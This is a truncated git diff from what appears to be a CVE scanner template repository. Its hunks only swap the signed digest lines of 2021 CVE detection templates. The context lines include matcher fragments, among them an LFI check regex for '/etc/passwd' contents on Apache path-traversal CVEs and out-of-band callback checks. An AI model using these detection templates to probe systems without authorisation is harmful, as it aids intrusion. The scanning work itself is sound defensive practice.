490a0046304402200c8db91a443e6d87655cc693a6fee9a6a10e91e35bf397e4874274c3acd4588d022042f5158f3f3350d85ca8256a12fc17a0a1d45b0ba1125e2fad28e79a90359e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index df87eb26fa..dcdb71e1cb 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008111d303ca6b6f56a2e50b1210b78146af0036e79f0ebf56930f5be7d0ab7475022100e3506e8d151fd899d096f197f4984c79bd88ce9fa29b71d151194eae4ca97a80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c5d9e12f40b4c1c8eb449ac07bec924972a78f30914acd8e4b7aaf39018c8d8022100f04c0994211505a6728ffdf50caac5f668e5a3b6eb60d74cb5235beeb2954da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index cec2d61812..5818b51527 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -44,4 +44,4 @@ http: - 'contains_all(header, "X-Interactsh-Version", "Server: oast")' - "!contains(body, '

Interactsh Server

')" condition: and -# digest: 4a0a0047304502201f9fbcee7dc1fc44a099c7f645d35d5693eeefa792f7825bcc51ed8b777174250221009e077fff03377fddd575987dba137468656114a1b15df68fb847b4cc71f2bf2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022012b2d2cc162a3ba9d6713a4ce4087a900e4b57689a0db634d050d4bb356f5957022068daa63c465b5791d98d139d49fec572590d775ac144a63277c51b8a6688794a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 79bd64e866..a743c9914a 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -126,4 +126,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200c53718fe980c8c145d3bf51515b9321e47bfaaf917a47caad718a3a380fb9430220718d7de44ecda49d098a76d52400dd0ba5c209a38e2f6354ce554bdba5b16220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2f037fa20d62fa3e078d54ef6da7d84ede4ebfbd90bd16cf9815d45e8bafff7022100b9a0fdb1aacc8a2d52710a0e2e5d32f4d467af80960bddac327165ce1c84b452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index fb5a0985a9..c846c3690c 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009deec4503a27481a39cbbd347424004f99b058a0a1a7f67d305f399baf9f467f02206bc9ce592299166b2928e8be08cffa8837c7ed8de82317de6532ec958c2cb82f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202cc2f7373c80af1c87453ca77a6c642ffc9694f0b651ba72be8790a389c97066022063d045826ec64715d6c6758801bc888a2cbbc225a836a9b7518c2db506143520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index 4cfb2912e3..f725e13eb7 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_1, "openSIS")' - "status_code == 200" condition: and -# digest: 4b0a00483046022100afc93af4ca71f78a66e289814973251a2fd69ed04dc9706b2033433f6cd71eec022100a0c2d05f94752f57f256120d5a78d05308e06c79adedadf48590890eb55fda30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086742fa2cc6187bb87d4710d96915dc5e16293bedd4e9fd2384df56c6d3b9c67022024039916bbc99fdf6d41f3406d69264b4ffa79095d2dfff3b32cefa16df87433:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index ddd7e1a67f..7eaceafbd5 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b7e2b1761ea31f96096ee954d371b91df663bcfa45c8f773a58b8f5f509c9e11022100a7cd7929229cc6298d1bd75e2f8a31d62e513dfae2e7c5fc750a14a9a971e44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbb87b3a6a8b27233038f63ce9a4ceb74d10c0a0903f075772be95739f992293022100dd475608f0d3e6699a90d7a44bbc87a4ab08c3fa3b53cccb5f9e47e1ec267771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index ab76590728..2467c8b56b 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d42d578672d94412d65c62a6441dc5ae3d6bdbcdcb52205a0f76b738f59bae2b022100e4aaee8b8d9b419de8d5215bd7ea2528e62a6adc0b71a29e92c42c2e4332af00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a45177c85c87a1bbe1162b82cd46948d453cf2d27deaa1a6123092e965191c85022100dd5c02cd4997895581e2b70c6cb55fc1e40a3e669d242ea5bf336234c66243b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 5ac9ff8970..3732a7c21e 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e40b07ad6becf60cf253cbf6f3c6333cd310e4bb45c38dee267dc7bfd4df626022044455d3d273af8f226531b6bef7faff64094cb241671e0b8f2cf623346345179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001bb28671723a59eec2203bdcf16edcc63d2f592e78a09760095857e99d80b96022100d553642740615fdbaaf0c4c2b24795fb67831c7eca1d5a1eaaf9ceccf368442a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 0076e05d1f..0cbad35746 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203511b1cb2f7a8cd1729b55ab1f8915b3f30176b7b4eae5c9bd1be8fcf97e283502206204cbe58595dcb38370fe4d484c219c311df12cd6167045da3a30e893057574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f3ec6d60993b7c6070d5d56350aa3b9ee5c1e5bb1f33329d41703b122b53789022100a7ced4bafa11bb2972ed33a679b167711cf29c44b0b5e9a09e14382c689fe396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index a809f32ab4..617113cec8 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205ec22a8c6f56f813625860d130e84ec88b50d3ac8b11f204d2af13a940bf663e022100dfa8b5515e53d1766d3cf8adc5a7287c3b90c0e3561aad887fd3417015e44469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5bdbfb883fe5d2e98ba17ba14af619f1e54c6f5778d79aded876dfc1f0f0212022100ac14b10d2cbd2eb9cad4e7bfa4405ef253caa476f43638f0fca53eb667a2a6f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index af01b0987a..c6d25ae56b 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206578ad56fe12b3717623febd88c16fa3cba460c41b778647f1a0db70973c379a022100c159963d168a9c326192172b2c1947dcddd02b144f591f97881e82f24aa8afa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220442d128690b119fc401ff306835bcdadb964da28a28b6fbada6d7c37297b8bdb02210082dd9ef1593d2fc65e264624c0fdc0894bfcad70627e09f048b5da6c0d7451d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index a4abd97109..d0e0acfc31 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203170f8da497c334096768ec8746961b30aeff00c01e06d9a9bdd6f9e6882f976022100a86c9e9cc5579d81b89be6201ce51f8495bf94bd872326e88e2d390df55662b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ff3c2f23ccba28dc9ada5e1c449f03b3f7622fec25b5b8766f1c3828ef0701802202cb68e714843300e1a48b5ce6f53da9d9edd29814ee2701755cdadb61a87cd78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 4749ad9896..79db015186 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201153f232729b91bd3e71a6b6d6e98653249cabfb5d7cd39d08ee1f7959bd87dc0221009a509c44b3856076f6de262873ab1443d5d8c17bc9d8c9ba5b9087f46907c9e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220452459bdae0b91da1a10bcfdd4d4162c8c0b19a10a97ae7a3a38361f2b932add022100ea1aade94fa3178ba6e8a4a5aaf770f1c7b699bc9257d11bf2de9400cd3eb150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 45126028dc..400128c4d8 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206710e69599921a61cfa9195cd270abfa17826fd524db0ecac89afc222476c7a40220511b892349f56025fa5e3917d204da9c68deb4808260c5f09c006048176c6d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201ca00d8be538bae205664cba3d1222a87b8e7d56e7cbe312ddc971211b8ee19f022100975a1b10d19af5af7b24c6ab170f34bdaa5856ac7075aaffad8997b7cdfbb09e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 4f350b3038..e064136988 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -64,4 +64,4 @@ http: group: 1 regex: - '"subTitle":"Grafana ([a-z0-9.]+)' -# digest: 490a004630440220150df20c5506e437af900f037ffb9c5f34c2d30fbbf6958817e8b423bbf601b6022032ca7a2df86fa3dc88fabbe5b0448eb47690fed488f140dddb8ffc0a4ae0293c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1ba9a3bb436a0aee8defc737db44aa6d5ea836edb665656afc5664136c4ab4402206a0c45d91638a1c1d02683999cd3095e0091e0674cfcbdcef1546ea7b4a93302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index c71da1bc06..19a4380c82 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -59,4 +59,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100883edb38fcae19e59f27d4186083d3d877ea6f3d4ac06f23a39aac3333eee128022100f3bca54269374c671b4aa37fe5d75bb65720a084359beded0ddb553286263455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064b27975b3e68083cf963f1ad832b952c8128f0102c4ca802ac34232aede6cd1022069cb21822d643d8f844273e6ca25c6880138c8aae5672374b92256e4572442bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 56b07326f3..606f707cd0 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -66,4 +66,4 @@ http: - '(sid:[a-z0-9,;:]+)' internal: true part: body -# digest: 4a0a00473045022100bb62f2af75e25787314e1f044a5a3e99e02997cc2a93b986a8d82e9b09429d3402206aab025b09043d3dabc02f1df26a7d36f2e6871fae22e2c1374e96d030748733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b3a348162cb62f7e90716842bf9442465d12b9230019fc58e6c50aff41f3e9802210083d12fd90d0f0796e3b1ff8fee964db32f4311f5ec3eebf3887d73c22213c9ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 2b5776dc3e..c12427ad4f 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 500 -# digest: 490a00463044022058875581989ca4e54d5e3986767a50ab67379b96399ae31370838a8802a48a8502202b98ca545a8067cc45c4f296e9c83a84457b158313840ce17c4fa979a4646cab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082ffeba5244b2355aebb82708913ac003ec222501eb6c2178ff0907e6b08c269022028637f8d68527b70f61dec192fe664515fe8c4ee71f67d562e0dedb37e373144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index 64f75b1bfb..69b8eba968 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -42,4 +42,4 @@ http: - "payara.security.openid.default.providerURI=" - "payara.security.openid.sessionScopedConfiguration=true" condition: and -# digest: 490a00463044022057f649f251cd6b6209745201b3d661f96d0711386c299bb52936b9b9c3889c75022015b8ccd003d9e10a75b53739e4137e586d65760d1566d6669d87aced044185af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009dda33617dbc7d9cc4809acd00ec1f8f8c171bd75315374b0c60649f65af6e2a022100aecd69da99a13cf13d4202d0c92fc6265de24a4e86473d3050a1bd30c0df8c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 3e3db96c0c..469d67dd49 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -88,4 +88,4 @@ http: - name="_wpnonce" value="([0-9a-z]+)" /> internal: true part: body -# digest: 490a0046304402202a525d5c59991514ca7aa771cde7ee9eaa3b3643850ffc79f4f05443c7a39034022028c5ce317d97df379d079120c76db5a5398118512631f4143cbdf5288694d131:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201dd29e9ad8d84b4858ec073a566f9c6a816a6b508edf7baafc6a2e7a004ec9e7022100821c0a3d9f0f26e7537245229faea8c39e2ac1c0d0d8dac10f5b1215032b1000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index fd507d8ad7..1d2e306c04 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009f97a087872b4e92f17b44312e692cfe4d0f8ec4a6f55166f35bcefacfcff9350220181d6e11e86c111ea5092c9e06badfb85abca47cb28463a32d64be15bf46c207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b397d96aeddbd254bb7ec713c50abafd8b5534e56bd672110d8f08b766957681022100c9f66e33f4fbe62da98961ede438d77ab8cd30c61f043f7a00b4fd31be2163f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index 8c60af6a4d..2a3faf7270 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220413201af64bc1a1a3d5af7e3f12991972d947be732535eda6ab233b27b11f0cb02205b02cc30b039336e87418c4f197167344c7863ba4811e31206fc8adb2771c217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009f35b908a21851e0b54903b436548d81ae690de17c6662b9477cc55a382a306c0221008a8017248a597009b54d71672833ef2d493587431bc340d8d889f0819a1db87e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index 9bf731b36f..cfb45a180a 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -66,4 +66,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 490a0046304402205742c2ebff8ce0fc7af74094966181c7ef1dae9ce633a2718335e5010e079d260220194ec4c580b0a470064374d97a3536dc10a47ccc4a195160d4e982e4276ac063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e00b4f3419281e85535c8babdf14dc5d69ce61e005a4551ffbf780be9557836302206b3b7ff52372daf9901fba4165b2880c8c7f44bac8490570c772ec5e0e11d627:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index 75e515e396..dc595064ba 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -60,4 +60,4 @@ http: - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100e92d124438043c580868e402e2e2ca7d5b520b29beb530c3e30a4600cf951d710220048f8b6f336648d1f32ed6955fdfcfac15fffc42ac0d26b99738da0e4b46c441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f52dd7f819790df020b5381025dcd5e54a8b5cfd5bfbe530017a35f0f93c9afa0221008d4e587c94c000b93b8455729b2220d39eddc29caf36faf7c5c4be9a094a6286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index aa55a5d779..2733048de5 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -66,4 +66,4 @@ http: name: LFI regex: - "root:.*:0:0:" -# digest: 4a0a0047304502207c99a23c7e14f2e1865aec960e5dae7b367048265b50d8d9c1de3ca37fa99d70022100a582a88b91acb6cb29dae3ef2ba0c241ea88e7541624b8c2a373525a8cfa816f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f9785988fba09605f9285153e188d8ce7959c6226d6bf4f905555bc37b8e1d71022052f699c19b5dd9dbf0bfc83e5772c2ebaea94ce0543c8ec0d13ca0a9334572ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 27f89c773e..6c7bb98b85 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -66,4 +66,4 @@ http: - type: json json: - '.data.users.nodes[].username' -# digest: 490a00463044022050fac34eaa4b8a5b2f213f24950dbd4dcf6f761ac17f565dcb5fd1c07d33eb870220753826f439204315cc1cde0868ff106d22fee305559bdd4ecea19e00b26b80bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ccac97e0f28411f31458bfe3e3acaf49c1900cda86a9250b01ca18b4ff3c44e20220734977a899f8a2fa28939fb575353b911fb189534566476e2473a52fc12f5fbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index e1675826d2..c0fc201788 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -69,4 +69,4 @@ http: name: LFI regex: - "root:.*:0:0:" -# digest: 4a0a004730450220631941b1855e5aeb33289778cb170dc873d3382190adfa010bec3870591df078022100d5eec25f6ed39e8e0f85c9abecc7b6505d3688a23cc8c4bb6bc2e90d836a7db1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022071b666a80a78175e95009e76b2e399a0b2f047588751214ad05c0ffae15c3a2902202738296c597c7458ee9e5d7a7858fc4e4f8623d985000f809e86db49f59061c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 9338228462..105d58ec0c 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206e3c9efaa3a715b8d207baf7f389da9fa984edf381b5bb061f1e06c3668bfe72022100eb3a65ea459eab92757794ebe916ddb26b77809cf661a936536cead7aae41ef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef547b709705cd162bef299f1306992a749058feb0952ce39744e97e08b3758f02207163751af97763e956710b6d00716255ec7402dcfd9896d111e22346d662d9db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index 5e1f284cae..7a97b14704 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -87,4 +87,4 @@ http: - '"token":"(.*)"' internal: true part: body -# digest: 4b0a00483046022100fdd3cd578eccb46c7597fa360d4be47d04933a30e1027352fcb1360511dc0a98022100f80fb95b6ce25488c7e214ac936292ba31abd86939eb4972f6b9675d55f05272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009937ba019c49591d8a5874dd069fee3a13d665ef89a42c99f87a07790501738f02207a678e45a053259259aa3f89ab20c12f3163816d7d9d7f85142f31758ae5077d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 769afc1ad9..4dbb740340 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -125,4 +125,4 @@ http: part: body words: - "System.ArgumentNullException" -# digest: 4b0a00483046022100ab0ccc84d2693500a44a225123543843cf611348becfc83ff492f9cdb6acd964022100b5b3a6d5594ac10297868507176627c21f711192a607e45d72197c0a811cd6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b4cad8ca9b38d3b7330ce6c6950921c2e9418129ca731b8790228b2a93d0eba02202c58a7a8b107eb0e825b838038f742a4c79e703267d544b953a1b94ce011bc98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index 1f0436df87..4c37ad85ee 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206dd93003af5b16b41ee56291ab005c6c3f16f409d1d15021ba955b2ce382f648022100faabadb8a53c37f1b7f22013ffe65ca71fbd83d105f2621c62226db40d7ae45d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e43334a553db86f4928a2df80a3848ae45888ae14f5b82235d6bb307078e993022100d261c9668f5ab13f125a082297169816287f2be7c3e80913d9e85d54c70324a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index ccde4d0c1f..fddec8da50 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022062c84cad29d9ca7703e8e03ac264d0edb5d2a5748ff4b8909f6c512b03c3df09022100f0d8621b267cecfd1c0c270eae28110c29cece9abc470147ae8a48a531c68df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b51385d9500f49914b6823b5d9cef7ed066d3cb23de022944f03a794d340f9702205c0edfe2fffb8bfe97563e584aa4f01ff61a933753434044f2f9a78395cae86e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index a3047dce60..500113d2a5 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205f1b22fc87729007a56fb51d06e2b4ca74c0e1de3d6f54ba05e9705cca21290c022100820374d79b55b9aa0c9eca7827d2619972595a3eb6a7c8a5cdd59da1dca8a20b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4d5487a082723df11144a8b0f2e88629a00dd2c7610b5a4ed7d8a93f701ed4902201134b8a066e2c335b4cb6f555ae9289fbd92320176a053562678150f2dd43eb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 79eddea40f..314fb55657 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e5ccb40089b0e2fa1296f286c8e7dfb74d393a1115d310fa13c104fe902d84f50220264642ede9a09512c264671738b08882267e18e889a09aa16fa793c0df4289ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e539cec72e0608744e6ac9b8173867c0b702f24fdc231a50d7e1e3027b963dfc022100a181b032c0888f7283e880641777e45f7c074cb6608ea789ed2625bff51b4a39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index 8a8e11843d..e47fbe6925 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100811a7e5c879a0363e2d74c0779cf35f9f69c0880bff8de452edff0ed0268dbb5022100c3a6abc846b879c935297046e3f25112da0797aa587f4c1bf08d925b0742b9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f23a33aefd2471f1eeef055d3ba229be00990b3407e83494dd661473b5e8ae602207c007c2dde1d4b0a85914503b8091ef7ed3052eeae87f42e6596c6dbdcd26fef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index fbba8a614d..b9d6b0296a 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204477b496e3241200c2b91d3461403b663af64b6a0a5536e1bb8fa7820e354f6e022033b11a21dc6450b3b2887a15a256e89542249fae1a025af4428bbe63a1486662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029569e4fe08ceb33fa8e4d3ef6822a584a2724dd28500f9949a35990ca33aa7602203a176b5878216b519f045620c214e0d451ac9599c7689b2761046a6b01f184e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index eca36652a5..6945419633 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ 